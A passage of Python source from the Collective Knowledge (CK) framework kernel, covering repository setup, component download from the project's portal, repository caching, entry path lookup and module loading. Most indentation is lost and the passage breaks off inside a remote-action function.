work['dir_default_cfg']=os.path.join(work['dir_default_kernel'], cfg['subdir_kernel_default'], cfg['subdir_ck_ext'], cfg['file_meta'])
work['dir_work_repo']=work['dir_default_repo']
work['dir_work_repo_path']=work['dir_default_repo_path']
work['dir_work_kernel']=work['dir_default_kernel']
work['dir_work_cfg']=work['dir_default_cfg']
if os.path.isfile(work['dir_default_cfg']):
r=load_json_file({'json_file':work['dir_default_cfg']})
if r['return']>0: return r
cfg1=r['dict']
# Update cfg
r=merge_dicts({'dict1':cfg, 'dict2':cfg1})
if r['return']>0: return r
work['repo_name_work']=cfg['repo_name_default']
work['repo_uid_work']=cfg['repo_uid_default']
# Check external repos
rps=os.environ.get(cfg['env_key_repos'],'').strip()
if rps=='':
       # In the original version, if the path to repos was not defined, CK used its own path:
       #   rps=os.path.join(work['env_root'],cfg['subdir_default_repos'])
       # However, this fails when CK is installed as root, hence it was changed to <user home dir>/CK
rps=os.path.join(home, cfg['user_home_dir_ext'])
if not os.path.isdir(rps):
os.makedirs(rps)
work['dir_repos']=rps
# Check CK_LOCAL_REPO environment variable - if doesn't exist, create in user space
s=os.environ.get(cfg['env_key_local_repo'],'').strip()
if s=='':
# Set up local default repository
s=os.path.join(rps, cfg['repo_name_local'])
if not os.path.isdir(s):
os.makedirs(s)
# Create description
rq=save_json_to_file({'json_file':os.path.join(s,cfg['repo_file']),
'dict':{'data_alias':cfg['repo_name_local'],
'data_uoa':cfg['repo_name_local'],
'data_name':cfg['repo_name_local'],
'data_uid':cfg['repo_uid_local']},
'sort_keys':'yes'})
if rq['return']>0: return rq
if s!='':
work['local_kernel_uoa']=cfg['subdir_kernel_default']
x=os.environ.get(cfg['env_key_local_kernel_uoa'],'').strip()
if x!='': work['local_kernel_uoa']=x
work['dir_local_repo']=os.path.realpath(s)
work['dir_local_repo_path']=os.path.join(work['dir_local_repo'], cfg['module_repo_name'], cfg['repo_name_local'])
work['dir_local_kernel']=os.path.join(work['dir_local_repo'], cfg['subdir_kernel'])
work['dir_local_cfg']=os.path.join(work['dir_local_kernel'], work['local_kernel_uoa'], cfg['subdir_ck_ext'], cfg['file_meta'])
# Update work repo!
work['dir_work_repo']=work['dir_local_repo']
work['dir_work_repo_path']=work['dir_local_repo_path']
work['dir_work_kernel']=work['dir_local_kernel']
work['dir_work_cfg']=work['dir_local_cfg']
work['repo_name_work']=cfg['repo_name_local']
work['repo_uid_work']=cfg['repo_uid_local']
paths_repos.append({'path':work['dir_local_repo'],
'repo_uoa':cfg['repo_name_local'],
'repo_uid':cfg['repo_uid_local'],
'repo_alias':cfg['repo_name_local']})
paths_repos.append({'path':work['dir_default_repo'],
'repo_uoa':cfg['repo_name_default'],
'repo_uid':cfg['repo_uid_default'],
'repo_alias':cfg['repo_name_default']})
# Prepare repo cache
work['dir_cache_repo_uoa']=os.path.join(work['dir_work_repo'],cfg['file_cache_repo_uoa'])
work['dir_cache_repo_info']=os.path.join(work['dir_work_repo'],cfg['file_cache_repo_info'])
# Check if first time and then copy local cache files (with remote-ck)
if not os.path.isfile(work['dir_cache_repo_uoa']) and not os.path.isfile(work['dir_cache_repo_info']):
rx=load_text_file({'text_file':os.path.join(work['dir_default_repo'],cfg['file_cache_repo_uoa'])})
if rx['return']>0: return rx
x1=rx['string']
rx=load_text_file({'text_file':os.path.join(work['dir_default_repo'],cfg['file_cache_repo_info'])})
if rx['return']>0: return rx
x2=rx['string']
rx=save_text_file({'text_file':work['dir_cache_repo_info'], 'string':x2})
if rx['return']>0: return rx
rx=save_text_file({'text_file':work['dir_cache_repo_uoa'], 'string':x1})
if rx['return']>0: return rx
# Check if local configuration exists, and if not, create it
if not os.path.isfile(work['dir_local_cfg']):
# Create empty local configuration
rx=add({'repo_uoa':cfg['repo_name_local'],
'module_uoa':cfg['subdir_kernel'],
'data_uoa':work['local_kernel_uoa']})
if rx['return']>0:
return {'return':rx['return'],
'error':'can\'t create local configuration entry'}
# Read kernel configuration (if exists)
if os.path.isfile(work['dir_work_cfg']):
r=load_json_file({'json_file':work['dir_work_cfg']})
if r['return']>0: return r
cfg1=r['dict']
# Update cfg
r=merge_dicts({'dict1':cfg, 'dict2':cfg1})
if r['return']>0: return r
# Check if need to log CK entries
if cfg.get('log_ck_entries','')!='':
log_ck_entries=True
initialized=True
return {'return':0}
##############################################################################
# List all files recursively in a given directory
#
# TARGET: CK kernel and low-level developers
def list_all_files(i):
"""
Input: {
path - top level path
(file_name) - search for a specific file name
(pattern) - return only files with this pattern
(path_ext) - path extension (needed for recursion)
(limit) - limit number of files (if directories with a large number of files)
(number) - current number of files
(all) - if 'yes' do not ignore special directories (like .cm)
(ignore_names) - list of names to ignore
(ignore_symb_dirs) - if 'yes', ignore symbolically linked dirs
(to avoid recursion such as in LLVM)
(add_path) - if 'yes', add path
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
list - dictionary of all files:
{"file_with_full_path":{"size":.., "path":..}
sizes - sizes of files (the same order)
number - number of files in a current directory (needed for recursion)
}
"""
number=0
if i.get('number','')!='':
number=int(i['number'])
inames=i.get('ignore_names',[])
fname=i.get('file_name','')
limit=-1
if i.get('limit','')!='':
limit=int(i['limit'])
a={}
iall=i.get('all','')
pe=''
if i.get('path_ext','')!='':
pe=i['path_ext']
po=i.get('path','')
if sys.version_info[0]<3: po=unicode(po)
pattern=i.get('pattern','')
if pattern!='':
import fnmatch
xisd=i.get('ignore_symb_dirs','')
isd=False
if xisd=='yes': isd=True
ap=i.get('add_path','')
try:
dirList=os.listdir(po)
except Exception as e:
        pass
else:
for fn in dirList:
p=os.path.join(po, fn)
if iall=='yes' or fn not in cfg['special_directories']:
if len(inames)==0 or fn not in inames:
if os.path.isdir(p):
if not isd or os.path.realpath(p)==p:
r=list_all_files({'path':p, 'all':iall, 'path_ext':os.path.join(pe, fn),
'number':str(number), 'ignore_names':inames, 'pattern':pattern,
'file_name':fname, 'ignore_symb_dirs':xisd, 'add_path':ap, 'limit': limit})
if r['return']>0: return r
a.update(r['list'])
else:
add=True
if fname!='' and fname!=fn:
add=False
if pattern!='' and not fnmatch.fnmatch(fn, pattern):
add=False
if add:
pg=os.path.join(pe, fn)
if os.path.isfile(p):
a[pg]={'size':os.stat(p).st_size}
if ap=='yes': a[pg]['path']=po
number=len(a)
if limit!=-1 and number>=limit:
break
return {'return':0, 'list':a, 'number':str(number)}
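# A usage sketch (illustrative arguments):
#   r=list_all_files({'path':'.', 'pattern':'*.json', 'ignore_symb_dirs':'yes'})
#   # r['list'] maps relative file names to {'size':...}; r['number'] is a string count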
##############################################################################
# Download entry from remote host (experimental)
#
# TARGET: end users
def download(i):
"""
Input: {
(repo_uoa)
(module_uoa)
(data_uoa)
(new_repo_uoa) - new repo UOA; "local" by default
(skip_module_check) - if 'yes', do not check if module for a given component exists
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
smc=(i.get('skip_module_check','')=='yes')
# Check components to skip
if muoa in ['repo', 'befd7892b0d469e9',
'env', '9b9b3208ac44b891',
'kernel', 'b1e99f6461424276',
'cfg', 'b34231a3467566f8']:
return {'return':0}
if muoa=='':
return {'return':1, 'error':'module UOA is not defined'}
if duoa=='': duoa='*'
# return {'return':1, 'error':'data UOA is not defined'}
nruoa=i.get('new_repo_uoa','')
if nruoa=='': nruoa='local'
# Check if writing to new repo is allowed
r=find_path_to_repo({'repo_uoa':nruoa})
if r['return']>0: return r
nruoa=r['repo_uoa']
nruid=r['repo_uid']
nrd=r['dict']
npath=r['path']
ii={'repo_uoa':nruoa, 'repo_uid':nruid, 'repo_dict':nrd}
r=check_writing(ii)
if r['return']>0: return r
rz={'return':0}
if o=='con':
# out('')
out(' WARNING: downloading missing CK component "'+muoa+':'+duoa+'" from the cKnowledge.io portal ...')
ii={
'action':'download',
'dict':{
'module_uoa':muoa,
'data_uoa':duoa
}
}
import ck.net
r=ck.net.access_ck_api({'url':cfg['cknowledge_api'], 'dict':ii})
if r['return']>0: return r
d=r['dict']
if d['return']>0:
if d['return']!=16:
return {'return':d['return'], 'error':d['error']}
out(' Warning: component not found')
return {'return':0}
nlst=d.get('components',[])
    # Check if module:module is there (bootstrapping)
lst1=[]
lst=[]
path_to_module=''
for q in nlst:
nmuoa=q['module_uoa']
nmuid=q['module_uid']
nduoa=q['data_uoa']
nduid=q['data_uid']
if nmuoa=='module' and nduoa=='module':
out(' Bootstrapping '+nmuoa+':'+nduoa+' ...')
# TBD: Check split dirs in local repo...
iii={'path':npath, 'data_uoa':'module', 'data_uid':nduid}
rz=find_path_to_entry(iii)
if rz['return']>0 and rz['return']!=16: return rz
elif rz['return']==16:
rz=create_entry(iii)
if rz['return']>0: return rz
npath2=rz['path']
iii={'path':npath2, 'data_uoa':'module', 'data_uid':nduid}
rz=find_path_to_entry(iii)
if rz['return']>0 and rz['return']!=16: return rz
elif rz['return']==16:
rz=create_entry(iii)
if rz['return']>0: return rz
path_to_module=rz['path']
lst.append(q)
else:
lst1.append(q)
lst+=lst1
# Recording downloaded components
for q in lst:
# Get UOA
nmuoa=q['module_uoa']
nmuid=q['module_uid']
nduoa=q['data_uoa']
nduid=q['data_uid']
file_url=q['file_url']
file_md5=q['file_md5']
out(' Downloading and extracting '+nmuoa+':'+nduoa+' ...')
# Check that module:module exists
if nmuoa=='module' and nduoa=='module' and path_to_module!='':
new_path=path_to_module
else:
if not smc:
save_state=cfg['download_missing_components']
cfg['download_missing_components']='no'
rz=access({'action':'find',
'module_uoa':'module',
'data_uoa':'module',
'common_func':'yes'})
if rz['return']>0 and rz['return']!=16: return rz
if rz['return']==16:
rz=download({'repo_uoa':nruoa,
'module_uoa':'module',
'data_uoa':'module',
'skip_module_check':'yes'})
if rz['return']>0: return rz
cfg['download_missing_components']=save_state
# Adding dummy module
rz=access({'action':'add',
'module_uoa':nmuoa,
'module_uid':nmuoa,
'data_uoa':nduoa,
'data_uid':nduid,
'repo_uoa':'local',
'common_func':'yes'})
if rz['return']>0:
out(' Skipping ...')
continue
new_path=rz['path']
# Prepare pack
ppz=os.path.join(new_path, 'pack.zip')
if os.path.isfile(ppz):
os.remove(ppz)
# Download file
# Import modules compatible with Python 2.x and 3.x
        import urllib
        try: from urllib.request import urlretrieve         # Python 3
        except ImportError: from urllib import urlretrieve  # Python 2
# Connect
try:
urlretrieve(file_url, ppz)
except Exception as e:
return {'return':1, 'error':'download failed ('+format(e)+')'}
statinfo = os.stat(ppz)
file_size=statinfo.st_size
# MD5 of the pack
rx=load_text_file({'text_file':ppz, 'keep_as_bin':'yes'})
if rx['return']>0: return rx
bpack=rx['bin']
import hashlib
md5=hashlib.md5(bpack).hexdigest()
if md5!=file_md5:
return {'return':1, 'error':'MD5 of the newly created pack ('+md5+') did not match the one from the portal ('+file_md5+')'}
# Unzipping archive
import zipfile
new_f=open(ppz, 'rb')
new_z=zipfile.ZipFile(new_f)
for new_d in new_z.namelist():
if new_d!='.' and new_d!='..' and not new_d.startswith('\\'):
new_pp=os.path.join(new_path,new_d)
if new_d.endswith('/'):
if not os.path.exists(new_pp): os.makedirs(new_pp)
else:
new_ppd=os.path.dirname(new_pp)
if not os.path.exists(new_ppd): os.makedirs(new_ppd)
# extract file
new_fo=open(new_pp, 'wb')
new_fo.write(new_z.read(new_d))
new_fo.close()
new_f.close()
# Remove pack file
os.remove(ppz)
return {'return':0}
##############################################################################
# Reload repo cache
#
# TARGET: CK kernel and low-level developers
def reload_repo_cache(i):
"""
Input: {
(force) - if 'yes', force recaching
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
global cache_repo_uoa, cache_repo_info, paths_repos_all, cache_repo_init
if i.get('force','')=='yes': # pragma: no cover
cache_repo_init=False
paths_repos_all=[]
if not cache_repo_init:
# Load repo UOA -> UID disambiguator
r=load_json_file({'json_file':work['dir_cache_repo_uoa']})
if r['return']!=16 and r['return']>0: return r
cache_repo_uoa=r.get('dict',{})
# Load cached repo info
r=load_json_file({'json_file':work['dir_cache_repo_info']})
if r['return']!=16 and r['return']>0: return r
cache_repo_info=r.get('dict',{})
# Prepare all paths
for q in cache_repo_info:
qq=cache_repo_info[q]
dd=qq['dict']
p=dd.get('path','')
if p!='':
paths_repos_all.append({'path':os.path.normpath(p),
'dict': dd, # Added in version 1.11.2.1 to support dir split per repo
'repo_uoa':qq['data_uoa'],
'repo_uid':qq['data_uid'],
'repo_alias':qq['data_alias']})
cache_repo_init=True
return {'return':0}
##############################################################################
# Save repo cache
#
# TARGET: CK kernel and low-level developers
def save_repo_cache(i):
"""
Input: {}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
r=save_json_to_file({'json_file':work['dir_cache_repo_uoa'], 'dict':cache_repo_uoa})
if r['return']>0: return r
r=save_json_to_file({'json_file':work['dir_cache_repo_info'], 'dict':cache_repo_info})
if r['return']>0: return r
return {'return':0}
##############################################################################
# Load repo from cache
#
# TARGET: CK kernel and low-level developers
def load_repo_info_from_cache(i):
"""
Input: {
repo_uoa - repo_uoa
}
Output: {
return - return code = 0, if successful
16, if repo not found (may be warning)
> 0, if error
(error) - error text if return > 0
repo_uoa - repo UOA
repo_uid - repo UID
repo_alias - repo alias
all other info from repo dict
}
"""
ruoa=i['repo_uoa']
ruid=ruoa
if cfg.get('force_lower','')=='yes':
ruoa=ruoa.lower()
ruid=ruid.lower()
if ruoa==cfg['repo_name_default'] or ruoa==cfg['repo_uid_default']:
d={}
d["path_to_repo_desc"]=work['dir_default_repo_path']
d["data_uid"]=cfg['repo_uid_default']
d["data_alias"]=cfg['repo_name_default']
d["data_uoa"]=cfg['repo_name_default']
d["dict"]={"default":"yes"}
elif ruoa==cfg['repo_name_local'] or ruoa==cfg['repo_uid_local']:
d={}
d["path_to_repo_desc"]=work['dir_local_repo_path']
d["data_uid"]=cfg['repo_uid_local']
d["data_alias"]=cfg['repo_name_local']
d["data_uoa"]=cfg['repo_name_local']
d["dict"]={"default":"yes"}
else:
r=reload_repo_cache({}) # Ignore errors
if r['return']>0: return r
if not is_uid(ruoa):
ruid=cache_repo_uoa.get(ruoa,'')
if ruid=='':
return {'return':1, 'error':'repository "'+ruoa+'" was not found in the cache. Check if repository exists or try "ck recache repo"'}
d=cache_repo_info.get(ruid,{})
if len(d)==0:
return {'return':1, 'error':'repository was not found in the cache'}
r={'return':0}
r.update(d)
return r
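# A usage sketch (illustrative repo name):
#   r=load_repo_info_from_cache({'repo_uoa':'default'})
#   # r['return']==0 and r['data_uid']==cfg['repo_uid_default']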
##############################################################################
# Find repo by path
#
# TARGET: CK kernel and low-level developers
def find_repo_by_path(i):
"""
Input: {
path - path to repo
}
Output: {
return - return code = 0, if successful
16, if repo not found (may be warning)
> 0, if error
(error) - error text if return > 0
repo_uoa - repo UOA
repo_uid - repo UID
repo_alias - repo alias
}
"""
p=i['path']
if p!='': p=os.path.normpath(p)
dd={}
found=False
if p==work['dir_default_repo']:
uoa=cfg['repo_name_default']
uid=cfg['repo_uid_default']
alias=uoa
found=True
elif p==work['dir_local_repo']:
uoa=cfg['repo_name_local']
uid=cfg['repo_uid_local']
alias=uoa
found=True
else:
r=reload_repo_cache({}) # Ignore errors
if r['return']>0: return r
for q in cache_repo_info:
qq=cache_repo_info[q]
dd=qq['dict']
if p==dd.get('path',''):
uoa=qq['data_uoa']
uid=qq['data_uid']
alias=uid
if not is_uid(uoa): alias=uoa
found=True
break
if not found:
return {'return':16, 'error': 'repository not found in this path'}
return {'return':0, 'repo_uoa': uoa, 'repo_uid': uid, 'repo_alias':alias, 'repo_dict':dd}
##############################################################################
# Find path to a given repo
#
# TARGET: end users
def find_path_to_repo(i):
"""
Input: {
(repo_uoa) - repo UOA; if empty, get the default repo
}
Output: {
return - return code = 0, if successful
16, if repo not found (may be warning)
> 0, if error
(error) - error text if return > 0
dict - dict from cache
path - path to repo
repo_uoa - repo UOA
repo_uid - repo UID
repo_alias - repo alias
}
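
       Example (illustrative sketch; assumes the kernel is imported as "ck"):

         import ck.kernel as ck

         r=ck.find_path_to_repo({'repo_uoa':'local'})
         if r['return']>0: print(r['error'])
         else: print(r['path'])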
"""
a=i.get('repo_uoa','')
if cfg.get('force_lower','')=='yes':
a=a.lower()
ai=a
pr=''
if a!='':
if a==cfg['repo_name_default'] or a==cfg['repo_uid_default']:
pr=work['dir_default_repo']
uoa=cfg['repo_name_default']
uid=cfg['repo_uid_default']
alias=uoa
dt={}
elif a==cfg['repo_name_local'] or a==cfg['repo_uid_local']:
pr=work['dir_local_repo']
uoa=cfg['repo_name_local']
uid=cfg['repo_uid_local']
alias=uoa
dt={}
else:
# Reload cache if not initialized
r=reload_repo_cache({}) # Ignore errors
if r['return']>0: return r
if not is_uid(a):
ai=cache_repo_uoa.get(a,'')
if ai=='':
return {'return':1, 'error':'repository "'+a+'" was not found in cache'}
cri=cache_repo_info.get(ai, {})
if len(cri)==0:
return {'return':1, 'error':'repository "'+ai+'" was not found in cache'}
dt=cri.get('dict',{})
pr=dt.get('path','')
uoa=cri['data_uoa']
uid=cri['data_uid']
alias=cri['data_alias']
else:
# Get current repo path
pr=work['dir_work_repo']
uoa=work['repo_name_work']
uid=work['repo_uid_work']
alias=uoa
dt={}
return {'return':0, 'path':pr, 'repo_uoa':uoa, 'repo_uid':uid, 'repo_alias':alias, 'dict':dt}
##############################################################################
# Find path to data (first search in default repo, then local one and then all other repos)
#
# TARGET: CK kernel and low-level developers
def find_path_to_data(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
}
Output: {
return - return code = 0, if successful
16, if data not found (may be warning)
> 0, if error
(error) - error text if return > 0
path - path to data
path_module - path to module entry with this entry
path_repo - path to the repository of this entry
repo_uoa - repo UOA
repo_uid - repo UID
repo_alias - repo alias
module_uoa - module UOA
module_uid - module UID
module_alias - module alias
uoa - data UOA
uid - data UID
alias - data alias
}
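
       Example (illustrative sketch; assumes the default CK repository
       with the standard 'module:repo' entry is present):

         import ck.kernel as ck

         r=ck.find_path_to_data({'module_uoa':'module', 'data_uoa':'repo'})
         if r['return']>0: print(r['error'])
         else: print(r['path'])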
"""
muoa=i['module_uoa']
muid='?'
duoa=i['data_uoa']
duid='?'
ruoa=i.get('repo_uoa','')
ruid=''
ralias=''
if ruoa!='':
r=find_path_to_repo({'repo_uoa':ruoa})
if r['return']>0: return r
ps=[r]
qmax=1
else:
ps=paths_repos
qmax=2
# Search
found=False
pr=''
pm=''
pd=''
for q in range(0,qmax):
if found: break
if q==1:
# Check / reload all repos
r=reload_repo_cache({}) # Ignore errors
if r['return']>0: return r
ps=paths_repos_all
for prx in ps:
pr=prx['path']
ruoa=prx['repo_uoa']
ruid=prx['repo_uid']
ralias=prx['repo_alias']
r=find_path_to_entry({'path':pr, 'data_uoa':muoa})
if r['return']>0 and r['return']!=16: return r
elif r['return']==0:
muoa=r['data_uoa']
muid=r['data_uid']
malias=r['data_alias']
pm=r['path']
# Check if there is a split of directories for this module in local config
# to handle numerous entries (similar to MediaWiki)
split_dirs=get_split_dir_number(prx.get('dict',{}), muid, muoa)
iii={'path':pm, 'data_uoa':duoa}
if split_dirs!=0:
iii['split_dirs']=split_dirs
r1=find_path_to_entry(iii)
if r1['return']>0 and r1['return']!=16: return r1
elif r1['return']==0:
found=True
pd=r1['path']
duoa=r1['data_uoa']
duid=r1['data_uid']
dalias=r1['data_alias']
break
if found: break
if not found:
s=''
# if ruoa!='': s+=ruoa+':'
s+=muoa+':'+duoa+'" ('
if ruoa!='':
# if ruid!='':s+=ruid+':'
# else: s+='?:'
s+='?:'
s+=muid+':'+duid+')'
if muoa=='module' or muoa=='032630d041b4fd8a':
if cfg.get('check_missing_modules','')=='yes':
ii={
'action':'download',
'dict':{
'module_uoa':muoa,
'data_uoa':duoa
}
}
import ck.net
r=ck.net.access_ck_api({'url':cfg['cknowledge_api'], 'dict':ii})
if r['return']>0: return r
d=r['dict']
component_url=''
dc=d.get('components',[])
if len(dc)==1:
component_url=dc[0].get('file_url','')
if component_url!='':
j=component_url.find('/?')
if j>=0:
component_url=component_url[:j]
s+='. However, it was found at '+component_url+' '
return {'return':16, 'error':'can\'t find path to CK entry "'+s}
# # Get info about repo
# if ruid=='':
# r=find_repo_by_path({'path':pr})
# if r['return']>0: return r
# ruoa=r['repo_uoa']
# ruid=r['repo_uid']
# ralias=r['repo_alias']
# qmax=1
# Check logging of repo:module:uoa to be able to rebuild CK dependencies
if log_ck_entries:
lce=cfg.get('log_ck_entries','')
if lce!='':
rl=save_text_file({'text_file':lce,
'string':'"action":"find", "repo_uoa":"'+
ruoa+'", "repo_uid":"'+
ruid+'", "module_uoa":"'+
muoa+'", "module_uid":"'+
muid+'", "data_uoa":"'+
duoa+'", "data_uid":"'+
duid+'"\n',
'append':'yes'})
if rl['return']>0: return rl
return {'return':0, 'path':pd, 'path_module':pm, 'path_repo':pr,
'repo_uoa':ruoa, 'repo_uid':ruid, 'repo_alias':ralias,
'module_uoa':muoa, 'module_uid':muid, 'module_alias':malias,
'data_uoa':duoa, 'data_uid':duid, 'data_alias':dalias}
##############################################################################
# Find path to an UOA entry (check UID or alias)
#
# TARGET: CK kernel and low-level developers
def find_path_to_entry(i):
"""
Input: {
path - (str) path to a repository
data_uoa - (str) data UOA
(split_dirs) - (int/str) number of first characters to split directory into subdirectories
to be able to handle many entries (similar to MediaWiki)
}
Output: {
return - return code = 0, if successful
16, if data not found (may be warning)
> 0, if error
(error) - error text if return > 0
path - path to data entry
data_uid - data uid (from UOA)
data_alias - data alias (from UOA)
data_uoa - data alias or data uid, if data alias==''
}
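
       Example (illustrative sketch; the path and entry name are hypothetical):

         import ck.kernel as ck

         r=ck.find_path_to_entry({'path':'/home/user/CK/my-repo/module',
                                  'data_uoa':'my-entry'})
         if r['return']==0: print(r['path'])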
"""
p=i['path']
duoa=i['data_uoa']
if cfg.get('force_lower','')=='yes':
duoa=duoa.lower()
if duoa=='': # pragma: no cover
raise Exception('data_uoa is empty')
split_dirs=safe_int(i.get('split_dirs',0),0)
# Check split
pp=p
# Disambiguate UOA
alias=''
if is_uid(duoa):
# If UID
uid=duoa
# Check if alias exists
p1=os.path.join(pp, cfg['subdir_ck_ext'], cfg['file_alias_u'] + uid)
found_alias=False
if os.path.isfile(p1):
try:
f=open(p1)
alias=f.readline().strip()
f.close()
found_alias=True
except Exception as e:
pass
# If alias exists, check directory with alias
if found_alias:
sd1,sd2=split_name(alias, split_dirs)
if sd2!='': # otherwise name is smaller than the split number
p=os.path.join(p,sd1)
p2=os.path.join(p, alias)
return {'return':0, 'path':p2, 'data_uid':uid, 'data_alias':alias, 'data_uoa':alias}
sd1,sd2=split_name(uid, split_dirs)
if sd2!='': # otherwise name is smaller than the split number
p=os.path.join(p,sd1)
p2=os.path.join(p, uid)
if os.path.isdir(p2):
return {'return':0, 'path':p2, 'data_uid':uid, 'data_alias':'', 'data_uoa':uid}
return {'return':-1}
sd1,sd2=split_name(duoa, split_dirs)
if sd2!='': # otherwise name is smaller than the split number
p=os.path.join(p,sd1)
# If alias
alias=duoa
p1=os.path.join(p, alias)
if sys.version_info[0]<3:
try: p1=p1.encode('utf8')
except Exception as e: pass
if os.path.isdir(p1):
# Check uid for this alias
p2=os.path.join(pp, cfg['subdir_ck_ext'], cfg['file_alias_a'] + alias)
try:
f=open(p2)
uid=f.readline().strip()
f.close()
except Exception as e:
return {'return':10, 'error':'inconsistent entry: alias "'+alias+'" exists, but not the UID in file '+p2,
'path':p1, 'data_alias':alias}
return {'return':0, 'path':p1, 'data_uid':uid, 'data_alias':alias, 'data_uoa':alias}
return {'return':16, 'error':'can\'t find path to CK entry'}
##############################################################################
# Load meta description from a path
#
# TARGET: CK kernel and low-level developers
def load_meta_from_path(i):
"""
Input: {
path - path to a data entry
(skip_updates) - if 'yes', do not load updates
(skip_desc) - if 'yes', do not load descriptions
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
dict - dict with meta description
path - path to json file with meta description
(info) - dict with info if exists
(path_info) - path to json file with info
(updates) - dict with updates if exists
(path_updates) - path to json file with updates
(path_desc) - path to json file with API description
}
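
       Example (illustrative sketch; the entry path is hypothetical):

         import ck.kernel as ck

         r=ck.load_meta_from_path({'path':'/home/user/CK/my-repo/module/my-entry'})
         if r['return']>0: print(r['error'])
         else: print(r['dict'])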
"""
p=i['path']
slu=i.get('skip_updates','')
sld=i.get('skip_desc','')
p1=os.path.join(p, cfg['subdir_ck_ext'], cfg['file_meta'])
if not os.path.isfile(p1):
p1=os.path.join(p, cfg['subdir_ck_ext'], cfg['file_meta_old']) # For compatibility with cM
if not os.path.isfile(p1):
p1=''
if p1!='':
rx={'return':0}
r=load_json_file({'json_file':p1})
if r['return']>0: return r
rx['path']=p1
rx['dict']=r['dict']
# Check info file
p2=os.path.join(p, cfg['subdir_ck_ext'], cfg['file_info'])
if os.path.isfile(p2):
r=load_json_file({'json_file':p2})
if r['return']>0: return r
rx['path_info']=p2
rx['info']=r['dict']
# Check updates file
if slu!='yes':
p3=os.path.join(p, cfg['subdir_ck_ext'], cfg['file_updates'])
if os.path.isfile(p3):
r=load_json_file({'json_file':p3})
if r['return']>0: return r
rx['path_updates']=p3
rx['updates']=r['dict']
# Check desc file
if sld!='yes':
p4=os.path.join(p, cfg['subdir_ck_ext'], cfg['file_desc'])
if os.path.isfile(p4):
r=load_json_file({'json_file':p4})
if r['return']>0: return r
rx['path_desc']=p4
rx['desc']=r['dict']
return rx
else:
return {'return':1, 'error':'meta description is not found in path '+p}
##############################################################################
# Load (CK) python module
#
# TARGET: end users
def load_module_from_path(i):
"""
Input: {
path - module path
module_code_name - module name
(cfg) - configuration of the module if exists ...
(skip_init) - if 'yes', skip init
(data_uoa) - module UOA (useful when printing error)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
code - python code object
path - full path to the module
cuid - internal UID of the module
}
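
       Example (illustrative sketch; the module path is hypothetical -
       CK module entries normally keep their code in 'module.py'):

         import ck.kernel as ck

         r=ck.load_module_from_path({'path':'/home/user/CK/my-repo/module/my-module',
                                     'module_code_name':'module'})
         if r['return']==0: mod=r['code']  # loaded python module object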
"""
p=i['path']
n=i['module_code_name']
xcfg=i.get('cfg',None)
# Find module
try:
x=imp.find_module(n, [p])
except ImportError as e: # pragma: no cover
return {'return':1, 'error':'can\'t find module code (path='+p+', name='+n+', err='+format(e)+')'}
ff=x[0]
full_path=x[1]
# Check if code has been already loaded
if full_path in work['cached_module_by_path'] and work['cached_module_by_path_last_modification'][full_path]==os.path.getmtime(full_path):
ff.close()
# Code already loaded
return work['cached_module_by_path'][full_path]
# Check if has dependency on specific CK kernel version
if xcfg!=None:
kd=xcfg.get('min_kernel_dep','')
if kd!='':
rx=check_version({'version':kd})
if rx['return']>0: return rx
ok=rx['ok']
version_str=rx['current_version']
if ok!='yes':
return {'return':1, 'error':'module "'+i.get('data_uoa','')+'" requires minimal CK kernel version '+kd+' while your version is '+version_str}
# Generate uid for the run-time extension of the loaded module
# otherwise modules with the same extension (key.py for example)
# will be reloaded ...
r=gen_uid({})
if r['return']>0: return r
ruid='rt-'+r['data_uid']
try:
c=imp.load_module(ruid, ff, full_path, x[2])
except ImportError as e: # pragma: no cover
return {'return':1, 'error':'can\'t load module code (path='+p+', name='+n+', err='+format(e)+')'}
x[0].close()
# Initialize module with this CK instance
c.ck=sys.modules[__name__]
if xcfg!=None: c.cfg=xcfg
# Initialize module
if i.get('skip_init','')!='yes':
# Check if init function exists
if getattr(c, 'init', None)!=None:
r=c.init(i)
if r['return']>0: return r
r={'return':0, 'code':c, 'path':full_path, 'cuid':ruid}
# Cache code together with its time of change
work['cached_module_by_path'][full_path]=r
work['cached_module_by_path_last_modification'][full_path]=os.path.getmtime(full_path)
return r
##############################################################################
# Perform remote action via CK web service
#
# TARGET: CK kernel and low-level developers
def perform_remote_action(i):
"""
Input: { See 'perform_action' function }
Output: { See 'perform_action' function }
"""
# Import modules compatible with Python 2.x and 3.x
import urllib
try: import urllib.request as urllib2
except: import urllib2 # pragma: no cover
try: from urllib.parse import urlencode
except: from urllib import urlencode # pragma: no cover
rr={'return':0}
# Get action
act=i.get('action','')
# Check output
o=i.get('out','')
if o=='con':
# out('Initiating remote access ...')
# out('')
i['out']='con'
i['quiet']='yes'
if act=='pull':
i['out']='json'
else:
i['out']='json'
# # Clean up input
# if o!='json_file':
# rr['out']='json' # Decided to return json to show that it's remote ...
if 'cid' in i:
del(i['cid']) # already processed
# Get URL
url=i.get('remote_server_url','')
# Process i
if 'remote_server_url' in i: del(i['remote_server_url'])
# Pre process if push file ...
if act=='push':
# Check file
fn=i.get('filename','')
if fn=='':
x=i.get('cids',[])
if len(x)>0:
fn=x[0]
if fn=='':
return {'return':1, 'error':'filename is empty'}
if not os.path.isfile(fn):
return {'return':1, 'error':'file '+fn+' not found'}
rx=convert_file_to_upload_string({'filename':fn})
if rx['return']>0: return rx
i['file_content_base64']=rx['file_content_base64']
# Leave only filename without path
i['filename']=os.path.basename(fn)
# Prepare post variables
r=dumps_json({'dict':i, 'skip_indent':'yes'})
if r['return']>0: return r
s=r['string'].encode('utf8')
post=urlencode({'ck_json':s})
if sys.version_info[0]>2: post=post.encode('utf8')
# Check if skip SSL certificate
ctx=None
add_ctx=False
if i.get('remote_skip_certificate_validation','')=='yes':
del(i['remote_skip_certificate_validation'])
import ssl
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
add_ctx=True
# If auth
auth=None
add_auth=False
au=i.get('remote_server_user','')
if au!='':
del(i['remote_server_user'])
ap=i.get('remote_server_pass','')
if ap!='':
